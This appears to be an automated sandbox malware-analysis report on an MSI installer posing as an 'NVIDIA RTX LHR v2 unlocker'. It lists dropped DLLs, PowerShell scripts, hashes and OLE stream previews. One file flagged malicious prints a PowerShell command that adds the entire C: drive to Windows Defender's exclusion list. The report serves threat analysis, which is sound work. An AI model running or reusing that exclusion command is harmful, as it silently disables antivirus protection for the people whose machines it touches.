                                  SHA-512:47BA474912D8530FC78FD2C61572A3C9E91A27B1BDFAB08869A550AE0452298B3FF63A06B607BECA9D8DF56BCCC19B9720F5E1EC59EA5F3FD0F85C9762058FB9
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........0..c..c..c"..b..c"..bV.c...b..c...b..c...b..c"..b..c"..b..c"..b..c..c..cH..b..cH..b..cH.Sc..c..;c..cH..b..cRich..c........PE..L...G..a.........."!.........&............... ...............................`............@.........................@...................0............"..........\B...S..p...................@U......HT..@............ ..$............................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...0...........................@..@.reloc..\B.......D..................@..B........................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):408544
                                  Entropy (8bit):6.410598211463919
                                  Encrypted:false
                                  SSDEEP:6144:FwznG9uw/r8fyHQMNvrPGtPu4AO9k9ZeWYhEIho7bZQ:SG9TAVMlSn30Z0EIhgbZQ
                                  MD5:5D25243E90673C44AC420D69676F9062
                                  SHA1:23234013562F7EF738DB615246D391B8E191B475
                                  SHA-256:0DDB820918F3918496E414617536226AF08E27A7F13E5A58444F8DCF297A65D5
                                  SHA-512:47BA474912D8530FC78FD2C61572A3C9E91A27B1BDFAB08869A550AE0452298B3FF63A06B607BECA9D8DF56BCCC19B9720F5E1EC59EA5F3FD0F85C9762058FB9
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........0..c..c..c"..b..c"..bV.c...b..c...b..c...b..c"..b..c"..b..c"..b..c..c..cH..b..cH..b..cH.Sc..c..;c..cH..b..cRich..c........PE..L...G..a.........."!.........&............... ...............................`............@.........................@...................0............"..........\B...S..p...................@U......HT..@............ ..$............................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...0...........................@..@.reloc..\B.......D..................@..B........................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):895968
                                  Entropy (8bit):6.449966561388975
                                  Encrypted:false
                                  SSDEEP:24576:fs3GWVtxNzxu3BBvF/BRROunzpGsOZ9d9lO1a:Kf7xuxBvF/BRROAUsOZ9d9lO1a
                                  MD5:22D986F98F87F5521ED2F3EDAA9374CA
                                  SHA1:9A1A233277E5A3A0A2565BFCAE593AF13B907EBF
                                  SHA-256:8E896FF52ED8FF11CC74907ECB2A5B9B9267289E54C956F9C9E07E8BA3A6D175
                                  SHA-512:69702074D8C9A5B33D948519A889F7671D374DDC2F2C3FAC8A4F0126E3C4A218077A015899AE54C7FA56E5198C57F4EFC55AD56227E9FFC02F3F412CFAFFAA5B
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.Z...4P..4P..4P..7Q..4P..1Q..4PN.0Q..4PN.7Q..4PN.1QN.4P..0Q..4P..5Q..4P..5P1.4P..=Q,.4P..4Q..4P...P..4P...P..4P..6Q..4PRich..4P........................PE..L......a.........."!................%........0............................................@.............................t.......................................<...x...p..............................@............0...............................text............................... ..`.rdata..V....0......................@..@.data..............................@....rsrc...............................@..@.reloc..<...........................@..B................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):408544
                                  Entropy (8bit):6.410598211463919
                                  Encrypted:false
                                  SSDEEP:6144:FwznG9uw/r8fyHQMNvrPGtPu4AO9k9ZeWYhEIho7bZQ:SG9TAVMlSn30Z0EIhgbZQ
                                  MD5:5D25243E90673C44AC420D69676F9062
                                  SHA1:23234013562F7EF738DB615246D391B8E191B475
                                  SHA-256:0DDB820918F3918496E414617536226AF08E27A7F13E5A58444F8DCF297A65D5
                                  SHA-512:47BA474912D8530FC78FD2C61572A3C9E91A27B1BDFAB08869A550AE0452298B3FF63A06B607BECA9D8DF56BCCC19B9720F5E1EC59EA5F3FD0F85C9762058FB9
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........0..c..c..c"..b..c"..bV.c...b..c...b..c...b..c"..b..c"..b..c"..b..c..c..cH..b..cH..b..cH.Sc..c..;c..cH..b..cRich..c........PE..L...G..a.........."!.........&............... ...............................`............@.........................@...................0............"..........\B...S..p...................@U......HT..@............ ..$............................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...0...........................@..@.reloc..\B.......D..................@..B........................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                  File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                  Category:dropped
                                  Size (bytes):5784
                                  Entropy (8bit):3.4920621874565785
                                  Encrypted:false
                                  SSDEEP:96:5wb5jTmmywV2BVrIovmkiGjxcj6BngOcvjb:5wbdTif/njVyvb
                                  MD5:FC1BB6C87FD1F08B534E52546561C53C
                                  SHA1:DB402C5C1025CF8D3E79DF7B868FD186243AA9D1
                                  SHA-256:A04750ED5F05B82B90F6B8EA3748BA246AF969757A5A4B74A0E25B186ADD520B
                                  SHA-512:5495F4AC3C8F42394A82540449526BB8DDD91ADF0A1A852A9E1F2D32A63858B966648B4099D9947D8AC68EE43824DACDA24C337C5B97733905E36C4921280E86
                                  Malicious:true
Preview (decoded from UTF-16LE; the report shows only the first bytes of the 5784-byte script):
param(
  [alias("propFile")]      [Parameter(Mandatory=$true)] [string] $msiPropOutFilePath
 ,[alias("propSep")]       [Parameter(Mandatory=$true)] [string] $msiPropKVSeparator
 ,[alias("scriptFile")]    [Parameter(Mandatory=$true)] [string] $userScriptFilePath
 ,[alias("scriptArgsFile")][Parameter(Mandatory=$false)][string] $userScriptArgsFilePath
 ,[Parameter(Mandatory=$true)]                          [string] $testPrefix
 ,[switch]
                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                  File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                  Category:dropped
                                  Size (bytes):120
                                  Entropy (8bit):3.430931929528047
                                  Encrypted:false
                                  SSDEEP:3:QVQlFc2TfSl5WLlgBI2Pv02qGKl+L9QlN6s9:QyXcnl5WmIW02qG/pwcs9
                                  MD5:2315AD4D342DA36907D6F4869069497B
                                  SHA1:5E3E895E13CEFA06D808F1C68F78C0CC36257399
                                  SHA-256:3CD5D3E66D38E6E65263815493D9E60E7F2B7409871849C9D59CFD114E4393FA
                                  SHA-512:6930FBB9E6E3905206B5294B1E54B200DCD66CBD29AD9136F166979B99381B53E0F61FE383BCE4552647B56AD601AD953F8577521AAFC4AA4B35408524A6DD55
                                  Malicious:true
                                  Preview:..p.o.w.e.r.s.h.e.l.l. .-.C.o.m.m.a.n.d. .A.d.d.-.M.p.P.r.e.f.e.r.e.n.c.e. .-.E.x.c.l.u.s.i.o.n.P.a.t.h. .".C.:.\.".....
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):865
                                  Entropy (8bit):5.4070958573132915
                                  Encrypted:false
                                  SSDEEP:24:BxSAQ1xvBnLx2DOXviNTTBP+7jJiX3Uu6WuHjeTKKjX4CIym1ZJXa:BZQHvhLoO/iBTFwjJuUwuqDYB1ZA
                                  MD5:28C57BA3B7B030A70108B8AF781422EB
                                  SHA1:68D31051121C9DB8F3442D8327BDF4D544B3A0B3
                                  SHA-256:BFE176E6456C0E5DF3681A93DEFF659AAC3890666B296ADB648F34BEFEE03F35
                                  SHA-512:5908FF1C3AFEB542ED1DD8556E29FC281562BC6C3C87923D48274D148B210586ECBE33CFE031B015DF71249E82FBED58FC571668D8C177F73A279A891961E07A
                                  Malicious:false
                                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220223185032..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 878411 (Microsoft Windows NT 10.0.17134.0)..Host Application: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\pss341F.ps1 -propFile C:\Users\user\AppData\Local\Temp\msi3350.txt -scriptFile C:\Users\user\AppData\Local\Temp\scr3351.ps1 -scriptArgsFile C:\Users\user\AppData\Local\Temp\scr3352.txt -propSep :<->: -testPrefix _testValue...Process ID: 7036..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {F58EB665-B875-433C-AEBE-8C055BEC1E2C}, Number of Words: 2, Subject: NVIDIA RTX LHR v2 unlocker, Author: Sergey, Name of Creating Application: NVIDIA RTX LHR v2 unlocker, Template: x64;2057, Comments: This installer database contains the logic and data required to install NVIDIA RTX LHR v2 unlocker., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                  Category:dropped
                                  Size (bytes):7207424
                                  Entropy (8bit):7.562593437382455
                                  Encrypted:false
                                  SSDEEP:196608:7+XqI6tGPI9Wo7x4dC29R/LcgZxVHh5J:7+aI6tGPI0k4YaB
                                  MD5:CA17C1BBEDC959AD89F1C1DBF6B7AA32
                                  SHA1:D24658FACE1F6FD3B457D7250C9B1A630798678D
                                  SHA-256:8FB46D2D56DD411AD10862204849ABF9A4546F1AB1D40BCB6B0CAC284DEBC055
                                  SHA-512:238F6E7B51A8D10B3828C3C9CEC4E24725B8A5D4503CD5B9EFF941906875057728DFD8D90DA456EDBB71A8FA8F68E60042961EE2AF56C0BC68F31F64FD066F6B
                                  Malicious:false
                                  Preview:......................>...................n.......................W...........I.......e.......6...7...8...9...:...;...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...,...-......./...c...d...e...f...g...h...i................................................... ...!..."................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...............................#...0........................................................................................... ...!..."...-.../...%...&...'...(...)...*...+...,...........1...5...A...2...3...4...7...6...>...8...9...:...;...<...=...H...?...@.......B...C...D...E...F...G...>...@.......K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):408544
                                  Entropy (8bit):6.410598211463919
                                  Encrypted:false
                                  SSDEEP:6144:FwznG9uw/r8fyHQMNvrPGtPu4AO9k9ZeWYhEIho7bZQ:SG9TAVMlSn30Z0EIhgbZQ
                                  MD5:5D25243E90673C44AC420D69676F9062
                                  SHA1:23234013562F7EF738DB615246D391B8E191B475
                                  SHA-256:0DDB820918F3918496E414617536226AF08E27A7F13E5A58444F8DCF297A65D5
                                  SHA-512:47BA474912D8530FC78FD2C61572A3C9E91A27B1BDFAB08869A550AE0452298B3FF63A06B607BECA9D8DF56BCCC19B9720F5E1EC59EA5F3FD0F85C9762058FB9
                                  Malicious:false
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........0..c..c..c"..b..c"..bV.c...b..c...b..c...b..c"..b..c"..b..c"..b..c..c..cH..b..cH..b..cH.Sc..c..;c..cH..b..cRich..c........PE..L...G..a.........."!.........&............... ...............................`............@.........................@...................0............"..........\B...S..p...................@U......HT..@............ ..$............................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...0...........................@..@.reloc..\B.......D..................@..B........................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):408544
                                  Entropy (8bit):6.410598211463919
                                  Encrypted:false
                                  SSDEEP:6144:FwznG9uw/r8fyHQMNvrPGtPu4AO9k9ZeWYhEIho7bZQ:SG9TAVMlSn30Z0EIhgbZQ
                                  MD5:5D25243E90673C44AC420D69676F9062
                                  SHA1:23234013562F7EF738DB615246D391B8E191B475
                                  SHA-256:0DDB820918F3918496E414617536226AF08E27A7F13E5A58444F8DCF297A65D5
                                  SHA-512:47BA474912D8530FC78FD2C61572A3C9E91A27B1BDFAB08869A550AE0452298B3FF63A06B607BECA9D8DF56BCCC19B9720F5E1EC59EA5F3FD0F85C9762058FB9
                                  Malicious:false
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........0..c..c..c"..b..c"..bV.c...b..c...b..c...b..c"..b..c"..b..c"..b..c..c..cH..b..cH..b..cH.Sc..c..;c..cH..b..cRich..c........PE..L...G..a.........."!.........&............... ...............................`............@.........................@...................0............"..........\B...S..p...................@U......HT..@............ ..$............................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...0...........................@..@.reloc..\B.......D..................@..B........................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:modified
                                  Size (bytes):589280
                                  Entropy (8bit):6.56720964313755
                                  Encrypted:false
                                  SSDEEP:12288:LCtfiZk5vSCOJf0egTmTBBAkvAfFBtVLK+AfgTD0vEhWQsQT6cFsDw9gA:490P36htVLK+AfgTovcj2cF6w9gA
                                  MD5:3B340A09B1218A0E699D497E1651B366
                                  SHA1:B60163743239704D217C983F040DAF256EE31BCB
                                  SHA-256:462B7E38D364571DF6751FFC2624CC993F19025909CCE39801217267E544AAF2
                                  SHA-512:14E7A5E93F06DC74D6ADEA793F6E79DD44BB9C5E65288FC44E619A95E3DC45D93B3D58CD812846CE499AB93F87CF60F794CD4972F34732DF3B6A5721B6BFD725
                                  Malicious:false
                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........;...Z.J.Z.J.Z.J~(.K.Z.J~(.K.Z.J~(.K.Z.J./.K.Z.J./.K.Z.J..!J.Z.J./.K.Z.J~(.K.Z.J.Z.J.[.J./.K.Z.J./.K.Z.J./#J.Z.J.ZKJ.Z.J./.K.Z.JRich.Z.J........................PE..L......a.........."!.........Z......;........................................ ............@..........................o......,p...................................T......p...................@.......x...@...............L............................text............................... ..`.rdata..............................@..@.data................l..............@....rsrc...............................@..@.reloc...T.......V..................@..B........................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):122558
                                  Entropy (8bit):5.3635233263223
                                  Encrypted:false
                                  SSDEEP:1536:iHzMV+f84vcIH17Yyxkjr0+NVRVle+yjeLWJOQzi7gZFOIKICh/81r8yQ1oXB4Hh:iHHJCoX5Ch
                                  MD5:CA1354FADB546AD9B3BFCF11E530A8E0
                                  SHA1:FBEC253189D62BFB3C42EB50C195D380F7C53E43
                                  SHA-256:284817E661E96F813EBFC20CFC991C7C3D72129E395D8BAFD24AFB898FF93EF8
                                  SHA-512:4B882C5B1A92EC59FF4BE87CE141578B0B06EA0099BF8D9606AFA2361204E22B33B642B5A59944ED42B17CD07115A44DB3E07608BDDC8F8F0C233CBA6ED9EED1
                                  Malicious:false
                                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 10:13:25.847 [3928]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.Hosting, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.863 [3928]: ngen returning 0x00000000..07/23/2020 10:13:25.925 [1900]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.ServerDocument, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.925 [1900]: ngen returning 0x00000000..07/23/2020 10:13:25.972 [4436]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.v4.0.Framework, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /N
                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {F58EB665-B875-433C-AEBE-8C055BEC1E2C}, Number of Words: 2, Subject: NVIDIA RTX LHR v2 unlocker, Author: Sergey, Name of Creating Application: NVIDIA RTX LHR v2 unlocker, Template: x64;2057, Comments: This installer database contains the logic and data required to install NVIDIA RTX LHR v2 unlocker., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                  Entropy (8bit):7.562593437382455
                                  TrID:
                                  • Microsoft Windows Installer (77509/1) 52.18%
                                  • Windows SDK Setup Transform Script (63028/2) 42.43%
                                  • Generic OLE2 / Multistream Compound File (8008/1) 5.39%
                                  File name:LHRUnlocker Install.msi
                                  File size:7207424
                                  MD5:ca17c1bbedc959ad89f1c1dbf6b7aa32
                                  SHA1:d24658face1f6fd3b457d7250c9b1a630798678d
                                  SHA256:8fb46d2d56dd411ad10862204849abf9a4546f1ab1d40bcb6b0cac284debc055
                                  SHA512:238f6e7b51a8d10b3828c3c9cec4e24725b8a5d4503cd5b9eff941906875057728dfd8d90da456edbb71a8fa8f68e60042961ee2af56c0bc68f31f64fd066f6b
                                  SSDEEP:196608:7+XqI6tGPI9Wo7x4dC29R/LcgZxVHh5J:7+aI6tGPI0k4YaB
                                  File Content Preview:........................>...................n.......................W...........I.......e.......6...7...8...9...:...;...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...,...-......./...c...d...e...f...g...h...i......................................
                                  Icon Hash:a2a0b496b2caca72
                                  Document Type:OLE
                                  Number of OLE Files:1
                                  Has Summary Info:True
                                  Application Name:NVIDIA RTX LHR v2 unlocker
                                  Encrypted Document:False
                                  Contains Word Document Stream:False
                                  Contains Workbook/Book Stream:False
                                  Contains PowerPoint Document Stream:False
                                  Contains Visio Document Stream:False
                                  Contains ObjectPool Stream:
                                  Flash Objects Count:
                                  Contains VBA Macros:False
                                  Code Page:1252
                                  Title:Installation Database
                                  Subject:NVIDIA RTX LHR v2 unlocker
                                  Author:Sergey
                                  Keywords:Installer, MSI, Database
                                  Comments:This installer database contains the logic and data required to install NVIDIA RTX LHR v2 unlocker.
                                  Template:x64;2057
                                  Last Saved By:
                                  Revision Number:{F58EB665-B875-433C-AEBE-8C055BEC1E2C}
                                  Last Printed:2009-12-11 11:47:44.850000
                                  Create Time:2009-12-11 11:47:44.850000
                                  Last Saved Time:2020-09-18 14:06:51.913000
                                  Number of Pages:200
                                  Number of Words:2
                                  Creating Application:NVIDIA RTX LHR v2 unlocker
                                  Security:0
                                  General
                                  Stream Path:\x5SummaryInformation
                                  File Type:data
                                  Stream Size:596
                                  Entropy:4.74586135252
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . $ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . X . . . . . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . # . . W z . . @ . . . # . . W z . . @ . . . . _ . . . . . . . . . . . . . . . . . . . . . . . . . . ' . . . { F 5 8 E B 6 6 5 - B 8
                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 24 02 00 00 10 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 01 00 00 00 b4 00 00 00 09 00 00 00 bc 00 00 00 0f 00 00 00 ec 00 00 00 03 00 00 00 f4 00 00 00 04 00 00 00 18 01 00 00
                                  General
                                  Stream Path:\x16786\x17522\x15550\x15884\x18327\x18152\x18472
                                  File Type:MS Windows icon resource - 4 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                  Stream Size:22257
                                  Entropy:4.03626304959
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . h . . . F . . . . . . . . ( . . . . . . . 0 0 . . . . . h & . . . . . . . . . . . . . . . . . > < . . ( . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:00 00 01 00 04 00 10 10 00 00 01 00 20 00 68 04 00 00 46 00 00 00 20 20 00 00 01 00 20 00 28 11 00 00 ae 04 00 00 30 30 00 00 01 00 20 00 68 26 00 00 d6 15 00 00 00 00 00 00 01 00 20 00 b3 1a 00 00 3e 3c 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x15358\x17388\x15912\x16947\x16693\x17207\x17522\x18358\x17383\x18479
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Stream Size:407008
                                  Entropy:6.5620566215
                                  Base64 Encoded:True
                                  Data ASCII:M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . . . . G . O . . . O . . . O . . . = . . . O . . . = . . l O . . . = . . . O . . . : . . . O . . . : . . . O . . . : . . . O . . b : . . . O . . b : . . . O . . . = . . . O . . . O . . . N . . b : . . . O . . b : . . . O . . b : S . . O . . . O ; . . O . .
                                  Data Raw:4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x15870\x18088
                                  File Type:MS Windows icon resource - 1 icon, 16x16, 16 colors
                                  Stream Size:318
                                  Entropy:2.03444158006
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . ( . . . . . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:00 00 01 00 01 00 10 10 10 00 00 00 00 00 28 01 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00 00 00 ff 00 ff 00 ff ff 00 00 ff ff ff 00 00 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x15998\x18098\x17768\x17116\x17384\x16175\x17766\x17644\x15735\x17956\x16817\x16939\x18357\x17383\x18479
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Stream Size:589280
                                  Entropy:6.56720964314
                                  Base64 Encoded:True
                                  Data ASCII:M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . . ; . . . Z . J . Z . J . Z . J ~ ( . K . Z . J ~ ( . K . Z . J ~ ( . K . Z . J . / . K . Z . J . / . K . Z . J . . ! J . Z . J . / . K . Z . J ~ ( . K . Z . J . Z . J . [ . J . / . K . Z . J . / . K . Z . J . / # J . Z . J . Z K J . Z . J . / . K . Z . J
